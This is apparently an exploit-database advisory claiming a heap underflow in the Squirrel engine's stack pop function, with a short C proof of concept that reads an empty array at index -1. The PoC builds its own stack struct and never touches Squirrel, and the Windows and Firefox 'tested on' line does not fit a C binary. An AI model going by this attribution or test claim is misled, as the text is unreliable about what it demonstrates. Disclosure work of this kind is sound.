Share
## https://sploitus.com/exploit?id=PACKETSTORM:216049
=============================================================================================================================================
    | # Title     : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : http://squirrel-lang.org/                                                                                                   |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability exists in the Squirrel engine’s stack implementation due to missing bounds checking in the PopTarget function. 
                      When attempting to pop from an empty stack, the function reads from data[size - 1] (index -1), causing a heap buffer underflow.
    
    [+] This allows:
    
    Information disclosure (heap metadata or adjacent memory content)
    
    Application crashes (segmentation faults)
    
    Potential escalation if the leaked memory affects control flow
    
    [+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow
    
    [+] Affected Component: Stack management in Squirrel Engine
    
    [+] Save as: poc.c
    
    [+] Translation with AddressSanitizer protection (recommended) : gcc -fsanitize=address -g poc.c -o poc
    
    [+] Run : ./poc
    
    [+] An ASAN report similar to:
    
    heap-buffer-overflow
    
    READ of size 8
    
    [+] POC   : 
    
    #include <stdio.h>
    #include <stdlib.h>
    
    typedef struct {
        long long *data;
        int size;
        int capacity;
    } TargetStack;
    
    long long PopTarget(TargetStack *stack) {
    
        long long target = stack->data[stack->size - 1]; 
        stack->size--;
        return target;
    }
    
    int main() {
    
        TargetStack stack;
        stack.capacity = 4;
        stack.size = 0; 
        stack.data = (long long *)malloc(stack.capacity * sizeof(long long));
    
        if (stack.data == NULL) return 1;
    
        printf("Starting PoC...\n");
        printf("Stack size: %d\n", stack.size);
        printf("Attempting to PopTarget from empty stack...\n");
        
        long long leaked_data = PopTarget(&stack);
        printf("Leaked data from index [-1]: %lld\n", leaked_data);
    
        free(stack.data);
        return 0;
    }
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================